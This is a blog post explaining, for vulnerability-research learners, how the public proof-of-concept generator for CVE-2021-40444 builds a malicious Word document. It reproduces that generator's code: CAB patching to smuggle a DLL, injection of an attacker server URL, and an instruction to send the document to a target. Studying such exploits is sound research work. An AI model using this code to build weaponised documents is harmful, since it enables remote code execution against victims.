For Aspiring Exploit Devs

Today

I got motivated reading a blog about reverse engineering so much so that we’re here now and I want to start a series!

I am a security researcher and I specialize in Windows vulnerability research (VR).

There are many directions one can take when it comes to VR, but at the end of the day it usually sums up to how much “risk” are we taking in performing analysis. If a sample is an absolute blackbox and has stripped symbols, heavy obfuscation, and other anti-analysis to it, then we’re taking quite a bit of risk, especially if we have no initial indicators on what kind of vulnerability we want to find within the sample in the first place.

Without going on too many tangents, the truth is there are way easier ways to go about discovering new vulnerabilities. One way we can find new vulns is by understanding old ones. Of the many reasons to do this, the most notable one for today is that patches aren’t always all-encompassing. Therefore, if the issue exists in one part of the program, it’s not a guarantee that it’s fixed if it happens to exist in another part. Sometimes even the first part isn’t fixed correctly from the start anyway!

Although this approach is pretty standard for the industry, I want to save discussion on that for future posts. Today I wanted to briefly take a moment to not understand the vulnerability, but rather to understand the exploit. Knowing how to understand exploits is another route one can take in vulnerability research since thel logic behind an exploit can be used to perform other exploits. Furthermore, there are times where you will first encounter an exploit that’s already being used in the wild and you will need to reverse engineer how a vulnerability works through that direction instead.

CVE-2021-40444

The folks over at lockedbyte developed a Proof of Concept (PoC) for CVE-2021-40444 by doing exactly what is detailed above. They obtained the sample with SHA256 938545f7bbe40738908a95da8cdeabb2a11ce2ca36b0f6a74deda9378d380a52 and analyzed it to understand the exploit it was using in the wild. The sample is a .docx file that can trigger remote code execution. According to official Microsoft reporting, the vulnerability is in MSHTML and an attacker can craft a malicious ActiveX control that is triggered by a document hosting the browser rendering engine.

With all of this information under our belt, we can now start looking at the main components of the Python code that generates the malicious document (maldoc) and see what is technically going on under the hood and better understand how the exploit works. Based off descriptions in the PoC, it seems like we should expect to be looking at a logical bug.

usage()

def usage():
	print('[%] Usage: ' + str(sys.argv[0]) + ' <generate/host> <options>')
	print('[i] Example: ' + str(sys.argv[0]) + ' generate test/calc.dll hxxp://192.168.1[.]41')
	print('[i] Example: sudo ' + str(sys.argv[0]) + ' host 80')
	exit()

The usage function helps get a better grasp on the inputs being used to generate the maldoc. We can briefly check it out to see what we can pass through, which in this case seems to be our malicious DLL that we want to load on the target system, as well as some remote address we may want the sample to connect to. For the sake of this analysis, we will focus more on how the payload is generated.

patch_cab()

...
m_off = 0x2d
...
def patch_cab(path):
	f_r = open(path, 'rb')
	cab_content = f_r.read()
	f_r.close()
	
	out_cab = cab_content[:m_off]
	out_cab += b'\x00\x5c\x41\x00'
	out_cab += cab_content[m_off+4:]

	out_cab = out_cab.replace(b'..\\msword.inf', b'../msword.inf')
	
	f_w = open(path, 'wb')
	f_w.write(out_cab)
	f_w.close()
	return

The patch_cab is interesting since it appears to expect a .cab file as input. The .cab extension stands for cabinet and it is a file that “contains several compressed files as a file library.” It seems that in this case, the PoC reads in the contents of the file and inserts the 4 bytes \x00\x5c\x41\x00 at offset 0x2d. It also replaces any bytes within the file from ..\\msword.inf to ../msword.inf and it writes all this information back into the cabinet file that was passed through as the parameter.

We can’t make any solid conclusions with the given information as of now, but these are interesting notes to keep track of. Additionally, the four bytes inserted into the file are \A in ascii. This could be a red-herring but could be worth noting.

generate_payload()

This function is rather lengthy so we can split it down into sections. Essentially the sample will read the file provided as the first parameter and it will write it to a new file data/word.dll. The sample then executes the command cp -r data/word_dat/ data/tmp_doc/ to copy over the contents from data/word_dat/ to data/tmp_doc. The contents of data/word_dat/ are provided already in the repo and they appear to be the shell contents of an empty .docx file.

After this is done, the sample writes the URL that was provided as the second parameter in the sample to _rels/document.xml.rels.

print('[*] Writing HTML Server URL...')
	
rels_pr = open('data/tmp_doc/word/_rels/document.xml.rels', 'r')
xml_content = rels_pr.read()
rels_pr.close()
	
xml_content = xml_content.replace('<EXPLOIT_HOST_HERE>', srv_url + '/word.html')
	
rels_pw = open('data/tmp_doc/word/_rels/document.xml.rels', 'w')
rels_pw.write(xml_content)
rels_pw.close()

The file modified to add the URL defines relationships for additional parts required by the document. This is a way to trigger the URL loading when the victim interacts with the document. The next step in the PoC is generating the malicious .docx itself which just zips up the temporary directory as a file document.docx

print('[*] Generating malicious docx file...')
	
os.chdir('data/tmp_doc/')
os.system('zip -r document.docx *')
execute_cmd('cp document.docx ../../out/document.docx')
os.chdir('../')
execute_cmd('rm -R tmp_doc/')
os.chdir('../')

Considering the maldoc is now supposedly done, we can see that the real magic happens in the generation of the malicious CAB file. This is what we saw earlier with the patch_cab function. This part of the PoC copies the malicious DLL to change the name from word.dll to msword.inf. The new file is then converted to a cabinet file named out.cab via the command lcab. This out.cab file is what gets passed through to the patch_cab function, and it seems that here we can finally see the logic bug since it seems we are able to properly disguise the malicious DLL as a cabinet file that is embedded within the document.

print('[*] Generating malicious CAB file...')

os.chdir('data/')
execute_cmd('mkdir cab/')
execute_cmd('cp word.dll msword.inf')
os.chdir('cab/')
execute_cmd('lcab \'../msword.inf\' out.cab')
patch_cab('out.cab')
execute_cmd('cp out.cab ../../srv/word.cab')
os.chdir('../')
execute_cmd('rm word.dll')
execute_cmd('rm msword.inf')
execute_cmd('rm -R cab/')
os.chdir('../')

There is additional network activity that gets resolved in the rest of the PoC beefore the document is ready to be delivered.

print('[*] Updating information on HTML exploit...')

os.chdir('srv/')
execute_cmd('cp backup.html word.html')

p_exp = open('word.html', 'r')
exploit_content = p_exp.read()
p_exp.close()

exploit_content = exploit_content.replace('<HOST_CHANGE_HERE>', srv_url + '/word.cab')

p_exp = open('word.html', 'w')
p_exp.write(exploit_content)
p_exp.close()

os.chdir('../')

print('[+] Malicious Word Document payload generated at: out/document.docx')
print('[+] Malicious CAB file generated at: srv/word.cab')
print('[i] You can execute now the server and then send document.docx to target')

We have now taken a deep dive into how the maldoc is created and the payload finalized, however, it is clear that there is further research to be done as the repository contains more information regarding the files hosted at the URL, as well as other network activity that is relate to this exploit working. Regardless, this is a good exercise into getting started with doing some VR using publically accessible knowledge, more of which we will do in posts to come!

Further Reading

This is an interesting and simple way to get started up on some VR in your off time to learn more about some new vulnerabilities that are out there. Repositories like PoC-in-GitHub offer a compiled list of readily available PoCs one can go through and try to understand for personal development. I intend to write more in-depth explanations to other approaches and better document it for higher quality articles. In the meantime, this is what I have for you now :)